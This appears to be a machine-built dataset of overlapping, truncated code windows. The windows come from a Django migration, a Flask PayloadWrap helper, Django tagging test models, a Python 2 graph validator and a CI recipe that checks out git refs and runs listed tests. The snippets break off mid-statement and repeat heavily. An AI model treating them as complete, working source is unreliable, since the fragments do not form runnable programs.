"migrations.AddField( model_name='favoritearticle', name='article', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Article'), ), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField(",
"to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles',",
"by Django 2.1 on 2019-05-15 12:47 from django.conf import settings from django.db import",
"Generated by Django 2.1 on 2019-05-15 12:47 from django.conf import settings from django.db",
"from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies",
"settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True",
"), migrations.AddField( model_name='favoritearticle', name='favorited_by', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'),",
"), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'),",
"'0001_initial'), ] operations = [ migrations.AddField( model_name='readingstats', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='favoritearticle',",
"field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='article', name='author', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList',",
"field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, to_field='username'), ), migrations.AddField( model_name='article', name='tagList', field=models.ManyToManyField(related_name='articles', to='article_tag.ArticleTag'), ), migrations.AlterUniqueTogether( name='readingstats', unique_together={('article',",
"migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL),",
"on 2019-05-15 12:47 from django.conf import settings from django.db import migrations, models import",
"models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('article_tag',",
"Django 2.1 on 2019-05-15 12:47 from django.conf import settings from django.db import migrations,"
] |
[
"def __init__(self, payload): if isinstance(payload, str): self._payload = json.loads(payload) else: self._payload = payload",
"dict() def __init__(self, payload): if isinstance(payload, str): self._payload = json.loads(payload) else: self._payload =",
"payload): if isinstance(payload, str): self._payload = json.loads(payload) else: self._payload = payload def to_json(self):",
"isinstance(payload, str): self._payload = json.loads(payload) else: self._payload = payload def to_json(self): return json.dumps(self._payload)",
"__init__(self, payload): if isinstance(payload, str): self._payload = json.loads(payload) else: self._payload = payload def",
"= dict() def __init__(self, payload): if isinstance(payload, str): self._payload = json.loads(payload) else: self._payload",
"PayloadWrap: _payload = dict() def __init__(self, payload): if isinstance(payload, str): self._payload = json.loads(payload)",
"class PayloadWrap: _payload = dict() def __init__(self, payload): if isinstance(payload, str): self._payload =",
"import json class PayloadWrap: _payload = dict() def __init__(self, payload): if isinstance(payload, str):",
"json class PayloadWrap: _payload = dict() def __init__(self, payload): if isinstance(payload, str): self._payload",
"if isinstance(payload, str): self._payload = json.loads(payload) else: self._payload = payload def to_json(self): return",
"<filename>flask_toolkit/shared/payload_wrap.py import json class PayloadWrap: _payload = dict() def __init__(self, payload): if isinstance(payload,",
"_payload = dict() def __init__(self, payload): if isinstance(payload, str): self._payload = json.loads(payload) else:"
] |
[
"['name'] class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering",
"smelly = models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def",
"= models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self): return self.state class Meta: ordering",
"ordering = ['state'] class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class",
"django.db import models from tagging.fields import TagField class Perch(models.Model): size = models.IntegerField() smelly",
"models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self): return self.state class Meta: ordering =",
"def __str__(self): return self.name class Meta: ordering = ['name'] class FormTest(models.Model): tags =",
"self.state class Meta: ordering = ['state'] class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self):",
"__str__(self): return self.name class Meta: ordering = ['name'] class Article(models.Model): name = models.CharField(maxlength=50)",
"= ['state'] class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta:",
"Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self): return self.state class",
"__str__(self): return self.name class Meta: ordering = ['name'] class FormTest(models.Model): tags = TagField()",
"= models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name'] class Article(models.Model):",
"null=True) def __str__(self): return self.state class Meta: ordering = ['state'] class Link(models.Model): name",
"TagField class Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state =",
"from django.db import models from tagging.fields import TagField class Perch(models.Model): size = models.IntegerField()",
"models from tagging.fields import TagField class Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True)",
"from tagging.fields import TagField class Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True) class",
"return self.state class Meta: ordering = ['state'] class Link(models.Model): name = models.CharField(maxlength=50) def",
"def __str__(self): return self.name class Meta: ordering = ['name'] class Article(models.Model): name =",
"perch = models.ForeignKey(Perch, null=True) def __str__(self): return self.state class Meta: ordering = ['state']",
"models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True)",
"self.name class Meta: ordering = ['name'] class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self):",
"class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering =",
"Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name']",
"class Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50)",
"models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self): return",
"['state'] class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering",
"= models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self):",
"Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch",
"size = models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch =",
"def __str__(self): return self.state class Meta: ordering = ['state'] class Link(models.Model): name =",
"= models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name'] class FormTest(models.Model):",
"= models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch,",
"return self.name class Meta: ordering = ['name'] class Article(models.Model): name = models.CharField(maxlength=50) def",
"class Meta: ordering = ['name'] class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return",
"import models from tagging.fields import TagField class Perch(models.Model): size = models.IntegerField() smelly =",
"tagging.fields import TagField class Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model):",
"__str__(self): return self.state class Meta: ordering = ['state'] class Link(models.Model): name = models.CharField(maxlength=50)",
"class Parrot(models.Model): state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self): return self.state",
"models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name'] class Article(models.Model): name",
"= ['name'] class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta:",
"= models.ForeignKey(Perch, null=True) def __str__(self): return self.state class Meta: ordering = ['state'] class",
"class Meta: ordering = ['state'] class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return",
"Meta: ordering = ['name'] class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name",
"models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name'] class FormTest(models.Model): tags",
"Meta: ordering = ['state'] class Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name",
"Link(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name']",
"models.ForeignKey(Perch, null=True) def __str__(self): return self.state class Meta: ordering = ['state'] class Link(models.Model):",
"name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering = ['name'] class",
"class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class Meta: ordering =",
"state = models.CharField(maxlength=50) perch = models.ForeignKey(Perch, null=True) def __str__(self): return self.state class Meta:",
"ordering = ['name'] class Article(models.Model): name = models.CharField(maxlength=50) def __str__(self): return self.name class",
"import TagField class Perch(models.Model): size = models.IntegerField() smelly = models.BooleanField(default=True) class Parrot(models.Model): state"
] |
[
"'edge' in filename: if len(v_list) != 2 and len(v_list) != 3: print '(invalid)",
"import sys def validate(filename): n_max = -1 v_set = set() with open(filename) as",
"% n_line return if len(v_list) == 3: v_list = v_list[: 2] for vid",
"'vertex ids are not continuous, lost %d id.' % (n_max - len(v_set) if",
"v_set else n_max - len(v_set) + 1) def main(): if len(sys.argv) != 2:",
"id.' % (n_max - len(v_set) if 0 in v_set else n_max - len(v_set)",
"== n_max + 1 and 0 in v_set: print '(valid) start index: 0,",
"sys def validate(filename): n_max = -1 v_set = set() with open(filename) as fin:",
"filename: if len(v_list) < 2: print '(invalid) at line %d' % n_line return",
"%d vertex.' % (n_max, len(v_set)) else: print '(valid) start index: 0, max vertex",
"% (n_max, len(v_set)) print 'vertex ids are not continuous, lost %d id.' %",
"print '(valid) start index: 1, max vertex idx: %d, total %d vertex.' %",
"n_max = -1 v_set = set() with open(filename) as fin: n_line = 0",
"filename: if len(v_list) != 2 and len(v_list) != 3: print '(invalid) at line",
"= -1 v_set = set() with open(filename) as fin: n_line = 0 for",
"(n_max - len(v_set) if 0 in v_set else n_max - len(v_set) + 1)",
"-*- coding: gbk -*- import sys def validate(filename): n_max = -1 v_set =",
"if 'adj' in filename: if len(v_list) < 2: print '(invalid) at line %d'",
"= set() with open(filename) as fin: n_line = 0 for line in fin:",
"gbk -*- import sys def validate(filename): n_max = -1 v_set = set() with",
"def validate(filename): n_max = -1 v_set = set() with open(filename) as fin: n_line",
"def main(): if len(sys.argv) != 2: print 'validate_graph.py graph_file' else: validate(sys.argv[1]) if __name__",
"at line %d' % n_line return if 'edge' in filename: if len(v_list) !=",
"% (n_max - len(v_set) if 0 in v_set else n_max - len(v_set) +",
"% n_line return if 'edge' in filename: if len(v_list) != 2 and len(v_list)",
"validate(filename): n_max = -1 v_set = set() with open(filename) as fin: n_line =",
"'adj' in filename: if len(v_list) < 2: print '(invalid) at line %d' %",
"max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) print 'vertex ids",
"0 in v_set else n_max - len(v_set) + 1) def main(): if len(sys.argv)",
"as fin: n_line = 0 for line in fin: n_line += 1 v_list",
"'(invalid) at line %d' % n_line return if 'edge' in filename: if len(v_list)",
"%d id.' % (n_max - len(v_set) if 0 in v_set else n_max -",
"0 in v_set: print '(valid) start index: 0, max vertex idx: %d, total",
"and 0 not in v_set: print '(valid) start index: 1, max vertex idx:",
"main(): if len(sys.argv) != 2: print 'validate_graph.py graph_file' else: validate(sys.argv[1]) if __name__ ==",
"< 2: print '(invalid) at line %d' % n_line return if 'edge' in",
"in v_list: vid = int(vid) if vid < 0: print '(invalid) at line",
"and len(v_list) != 3: print '(invalid) at line %d' % n_line return if",
"if len(sys.argv) != 2: print 'validate_graph.py graph_file' else: validate(sys.argv[1]) if __name__ == '__main__':",
"1 v_list = line.rstrip().split() if 'adj' in filename: if len(v_list) < 2: print",
"idx: %d, total %d vertex.' % (n_max, len(v_set)) elif len(v_set) == n_max +",
"print '(valid) start index: 0, max vertex idx: %d, total %d vertex.' %",
"0, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) print 'vertex",
"total %d vertex.' % (n_max, len(v_set)) print 'vertex ids are not continuous, lost",
"v_set: print '(valid) start index: 1, max vertex idx: %d, total %d vertex.'",
"at line %d' % n_line return if len(v_list) == 3: v_list = v_list[:",
"index: 0, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) print",
"total %d vertex.' % (n_max, len(v_set)) else: print '(valid) start index: 0, max",
"3: v_list = v_list[: 2] for vid in v_list: vid = int(vid) if",
"ids are not continuous, lost %d id.' % (n_max - len(v_set) if 0",
"%d' % n_line return if 'edge' in filename: if len(v_list) != 2 and",
"- len(v_set) if 0 in v_set else n_max - len(v_set) + 1) def",
"at line %d' % n_line return v_set.add(vid) if vid > n_max: n_max =",
"1, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) elif len(v_set)",
"line %d' % n_line return if len(v_list) == 3: v_list = v_list[: 2]",
"- len(v_set) + 1) def main(): if len(sys.argv) != 2: print 'validate_graph.py graph_file'",
"0 not in v_set: print '(valid) start index: 1, max vertex idx: %d,",
"len(v_set) == n_max and 0 not in v_set: print '(valid) start index: 1,",
"coding: gbk -*- import sys def validate(filename): n_max = -1 v_set = set()",
"n_line = 0 for line in fin: n_line += 1 v_list = line.rstrip().split()",
"return if 'edge' in filename: if len(v_list) != 2 and len(v_list) != 3:",
"n_line return if 'edge' in filename: if len(v_list) != 2 and len(v_list) !=",
"with open(filename) as fin: n_line = 0 for line in fin: n_line +=",
"return if len(v_list) == 3: v_list = v_list[: 2] for vid in v_list:",
"print '(invalid) at line %d' % n_line return if len(v_list) == 3: v_list",
"index: 1, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) elif",
"fin: n_line += 1 v_list = line.rstrip().split() if 'adj' in filename: if len(v_list)",
"start index: 0, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set))",
"'(valid) start index: 1, max vertex idx: %d, total %d vertex.' % (n_max,",
"== 3: v_list = v_list[: 2] for vid in v_list: vid = int(vid)",
"len(v_set)) else: print '(valid) start index: 0, max vertex idx: %d, total %d",
"1) def main(): if len(sys.argv) != 2: print 'validate_graph.py graph_file' else: validate(sys.argv[1]) if",
"(n_max, len(v_set)) print 'vertex ids are not continuous, lost %d id.' % (n_max",
"v_list[: 2] for vid in v_list: vid = int(vid) if vid < 0:",
"if vid > n_max: n_max = vid if len(v_set) == n_max and 0",
"0: print '(invalid) at line %d' % n_line return v_set.add(vid) if vid >",
"n_line += 1 v_list = line.rstrip().split() if 'adj' in filename: if len(v_list) <",
"!= 3: print '(invalid) at line %d' % n_line return if len(v_list) ==",
"else n_max - len(v_set) + 1) def main(): if len(sys.argv) != 2: print",
"'(valid) start index: 0, max vertex idx: %d, total %d vertex.' % (n_max,",
"'(invalid) at line %d' % n_line return if len(v_list) == 3: v_list =",
"vid < 0: print '(invalid) at line %d' % n_line return v_set.add(vid) if",
"in fin: n_line += 1 v_list = line.rstrip().split() if 'adj' in filename: if",
"(n_max, len(v_set)) elif len(v_set) == n_max + 1 and 0 in v_set: print",
"2 and len(v_list) != 3: print '(invalid) at line %d' % n_line return",
"print 'vertex ids are not continuous, lost %d id.' % (n_max - len(v_set)",
"line %d' % n_line return v_set.add(vid) if vid > n_max: n_max = vid",
"idx: %d, total %d vertex.' % (n_max, len(v_set)) else: print '(valid) start index:",
"v_set = set() with open(filename) as fin: n_line = 0 for line in",
"vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) elif len(v_set) == n_max",
"in v_set: print '(valid) start index: 0, max vertex idx: %d, total %d",
"-*- import sys def validate(filename): n_max = -1 v_set = set() with open(filename)",
"!= 2 and len(v_list) != 3: print '(invalid) at line %d' % n_line",
"n_max and 0 not in v_set: print '(valid) start index: 1, max vertex",
"n_max + 1 and 0 in v_set: print '(valid) start index: 0, max",
"v_list: vid = int(vid) if vid < 0: print '(invalid) at line %d'",
"v_list = v_list[: 2] for vid in v_list: vid = int(vid) if vid",
"are not continuous, lost %d id.' % (n_max - len(v_set) if 0 in",
"= v_list[: 2] for vid in v_list: vid = int(vid) if vid <",
"-1 v_set = set() with open(filename) as fin: n_line = 0 for line",
"int(vid) if vid < 0: print '(invalid) at line %d' % n_line return",
"start index: 1, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set))",
"line in fin: n_line += 1 v_list = line.rstrip().split() if 'adj' in filename:",
"total %d vertex.' % (n_max, len(v_set)) elif len(v_set) == n_max + 1 and",
"len(sys.argv) != 2: print 'validate_graph.py graph_file' else: validate(sys.argv[1]) if __name__ == '__main__': main()",
"print '(invalid) at line %d' % n_line return v_set.add(vid) if vid > n_max:",
"len(v_list) != 3: print '(invalid) at line %d' % n_line return if len(v_list)",
"%d' % n_line return v_set.add(vid) if vid > n_max: n_max = vid if",
"% n_line return v_set.add(vid) if vid > n_max: n_max = vid if len(v_set)",
"in v_set: print '(valid) start index: 1, max vertex idx: %d, total %d",
"v_set: print '(valid) start index: 0, max vertex idx: %d, total %d vertex.'",
"= vid if len(v_set) == n_max and 0 not in v_set: print '(valid)",
"+ 1 and 0 in v_set: print '(valid) start index: 0, max vertex",
"1 and 0 in v_set: print '(valid) start index: 0, max vertex idx:",
"if len(v_list) == 3: v_list = v_list[: 2] for vid in v_list: vid",
"line %d' % n_line return if 'edge' in filename: if len(v_list) != 2",
"vid = int(vid) if vid < 0: print '(invalid) at line %d' %",
"vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) else: print '(valid) start",
"%d vertex.' % (n_max, len(v_set)) print 'vertex ids are not continuous, lost %d",
"== n_max and 0 not in v_set: print '(valid) start index: 1, max",
"vertex.' % (n_max, len(v_set)) else: print '(valid) start index: 0, max vertex idx:",
"= int(vid) if vid < 0: print '(invalid) at line %d' % n_line",
"0, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) else: print",
"v_set.add(vid) if vid > n_max: n_max = vid if len(v_set) == n_max and",
"for line in fin: n_line += 1 v_list = line.rstrip().split() if 'adj' in",
"if vid < 0: print '(invalid) at line %d' % n_line return v_set.add(vid)",
"len(v_list) < 2: print '(invalid) at line %d' % n_line return if 'edge'",
"%d, total %d vertex.' % (n_max, len(v_set)) elif len(v_set) == n_max + 1",
"fin: n_line = 0 for line in fin: n_line += 1 v_list =",
"2: print '(invalid) at line %d' % n_line return if 'edge' in filename:",
"'(invalid) at line %d' % n_line return v_set.add(vid) if vid > n_max: n_max",
"elif len(v_set) == n_max + 1 and 0 in v_set: print '(valid) start",
"return v_set.add(vid) if vid > n_max: n_max = vid if len(v_set) == n_max",
"vertex.' % (n_max, len(v_set)) elif len(v_set) == n_max + 1 and 0 in",
"if 0 in v_set else n_max - len(v_set) + 1) def main(): if",
"%d' % n_line return if len(v_list) == 3: v_list = v_list[: 2] for",
"print '(invalid) at line %d' % n_line return if 'edge' in filename: if",
"index: 0, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) else:",
"set() with open(filename) as fin: n_line = 0 for line in fin: n_line",
"len(v_set)) print 'vertex ids are not continuous, lost %d id.' % (n_max -",
"vid > n_max: n_max = vid if len(v_set) == n_max and 0 not",
"idx: %d, total %d vertex.' % (n_max, len(v_set)) print 'vertex ids are not",
"+= 1 v_list = line.rstrip().split() if 'adj' in filename: if len(v_list) < 2:",
"v_list = line.rstrip().split() if 'adj' in filename: if len(v_list) < 2: print '(invalid)",
"and 0 in v_set: print '(valid) start index: 0, max vertex idx: %d,",
"# -*- coding: gbk -*- import sys def validate(filename): n_max = -1 v_set",
"len(v_set)) elif len(v_set) == n_max + 1 and 0 in v_set: print '(valid)",
"if len(v_list) != 2 and len(v_list) != 3: print '(invalid) at line %d'",
"not in v_set: print '(valid) start index: 1, max vertex idx: %d, total",
"not continuous, lost %d id.' % (n_max - len(v_set) if 0 in v_set",
"line.rstrip().split() if 'adj' in filename: if len(v_list) < 2: print '(invalid) at line",
"for vid in v_list: vid = int(vid) if vid < 0: print '(invalid)",
"> n_max: n_max = vid if len(v_set) == n_max and 0 not in",
"vid in v_list: vid = int(vid) if vid < 0: print '(invalid) at",
"n_max = vid if len(v_set) == n_max and 0 not in v_set: print",
"% (n_max, len(v_set)) else: print '(valid) start index: 0, max vertex idx: %d,",
"vid if len(v_set) == n_max and 0 not in v_set: print '(valid) start",
"vertex.' % (n_max, len(v_set)) print 'vertex ids are not continuous, lost %d id.'",
"lost %d id.' % (n_max - len(v_set) if 0 in v_set else n_max",
"len(v_set) == n_max + 1 and 0 in v_set: print '(valid) start index:",
"in filename: if len(v_list) != 2 and len(v_list) != 3: print '(invalid) at",
"n_line return v_set.add(vid) if vid > n_max: n_max = vid if len(v_set) ==",
"= line.rstrip().split() if 'adj' in filename: if len(v_list) < 2: print '(invalid) at",
"len(v_list) == 3: v_list = v_list[: 2] for vid in v_list: vid =",
"max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) else: print '(valid)",
"len(v_set) if 0 in v_set else n_max - len(v_set) + 1) def main():",
"(n_max, len(v_set)) else: print '(valid) start index: 0, max vertex idx: %d, total",
"+ 1) def main(): if len(sys.argv) != 2: print 'validate_graph.py graph_file' else: validate(sys.argv[1])",
"if len(v_list) < 2: print '(invalid) at line %d' % n_line return if",
"= 0 for line in fin: n_line += 1 v_list = line.rstrip().split() if",
"len(v_set) + 1) def main(): if len(sys.argv) != 2: print 'validate_graph.py graph_file' else:",
"len(v_list) != 2 and len(v_list) != 3: print '(invalid) at line %d' %",
"%d, total %d vertex.' % (n_max, len(v_set)) else: print '(valid) start index: 0,",
"n_line return if len(v_list) == 3: v_list = v_list[: 2] for vid in",
"0 for line in fin: n_line += 1 v_list = line.rstrip().split() if 'adj'",
"2] for vid in v_list: vid = int(vid) if vid < 0: print",
"if len(v_set) == n_max and 0 not in v_set: print '(valid) start index:",
"< 0: print '(invalid) at line %d' % n_line return v_set.add(vid) if vid",
"else: print '(valid) start index: 0, max vertex idx: %d, total %d vertex.'",
"max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) elif len(v_set) ==",
"vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) print 'vertex ids are",
"n_max - len(v_set) + 1) def main(): if len(sys.argv) != 2: print 'validate_graph.py",
"in v_set else n_max - len(v_set) + 1) def main(): if len(sys.argv) !=",
"%d, total %d vertex.' % (n_max, len(v_set)) print 'vertex ids are not continuous,",
"3: print '(invalid) at line %d' % n_line return if len(v_list) == 3:",
"continuous, lost %d id.' % (n_max - len(v_set) if 0 in v_set else",
"in filename: if len(v_list) < 2: print '(invalid) at line %d' % n_line",
"open(filename) as fin: n_line = 0 for line in fin: n_line += 1",
"n_max: n_max = vid if len(v_set) == n_max and 0 not in v_set:",
"% (n_max, len(v_set)) elif len(v_set) == n_max + 1 and 0 in v_set:",
"%d vertex.' % (n_max, len(v_set)) elif len(v_set) == n_max + 1 and 0",
"if 'edge' in filename: if len(v_list) != 2 and len(v_list) != 3: print"
] |
[
"Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'), } def RunSteps(api,",
"result = api.python.inline( 'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print",
"import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = {",
"print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests = [] for",
"'test: %s' % l cmd = l.split() if cmd[0] == 'python' and len(cmd)",
"source code is governed by a BSD-style license that can be # found",
"of this source code is governed by a BSD-style license that can be",
"'%s' % refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule',",
"and refspec must be given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset',",
"refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url and",
"'./a.sh\\npython b.py\\npython c.py args'))) tests = [] for l in result.stdout.splitlines(): l =",
"patch_repository_url, patch_ref): if patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url and patch_ref repo_url",
"patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url and patch_ref",
"%s' % l cmd = l.split() if cmd[0] == 'python' and len(cmd) >=",
"patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url and patch_ref repo_url = patch_repository_url refspec",
"be given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset', ['git', 'reset', '--hard'])",
"assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch',",
"api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s' % refspec])",
"if cmd[0] == 'python' and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name,",
"result.stdout.splitlines(): l = l.strip() if l and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for",
"api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra',",
"l.strip() if l and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in sorted(tests):",
"yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield",
"in result.stdout.splitlines(): l = l.strip() if l and not l.startswith('#'): tests.append(l) with api.step.defer_results():",
"'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { # New Gerrit patch properties. 'patch_storage': Property(kind=str,",
"l and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in sorted(tests): name =",
"api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties(",
"'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update', '--init', '--recursive']) result = api.python.inline( 'read",
"patch_ref): if patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url and patch_ref repo_url =",
"['git', 'submodule', 'update', '--init', '--recursive']) result = api.python.inline( 'read tests', # Multiplatform \"cat\"",
"RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage == 'gerrit' assert",
"if l and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in sorted(tests): name",
"api.step.defer_results(): for l in sorted(tests): name = 'test: %s' % l cmd =",
"this source code is governed by a BSD-style license that can be #",
"= api.python.inline( 'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\",",
"['git', 'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s'",
"api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra', refspec='release-52' ) + api.override_step_data('test: ./a.sh',",
"step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests = [] for l in result.stdout.splitlines():",
"l in sorted(tests): name = 'test: %s' % l cmd = l.split() if",
"BSD-style license that can be # found in the LICENSE file. from recipe_engine.recipe_api",
"LICENSE file. from recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step',",
"GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', )",
"= l.strip() if l and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in",
"[ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { # New Gerrit patch",
"'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), #",
"Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref':",
"fetch', ['git', 'fetch', repo_url, '%s' % refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git",
"a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'), } def",
"+ api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') +",
"assert patch_storage == 'gerrit' assert patch_repository_url and patch_ref repo_url = patch_repository_url refspec =",
"patch_ref assert repo_url and refspec, 'repository url and refspec must be given' assert",
"'--init', '--recursive']) result = api.python.inline( 'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as",
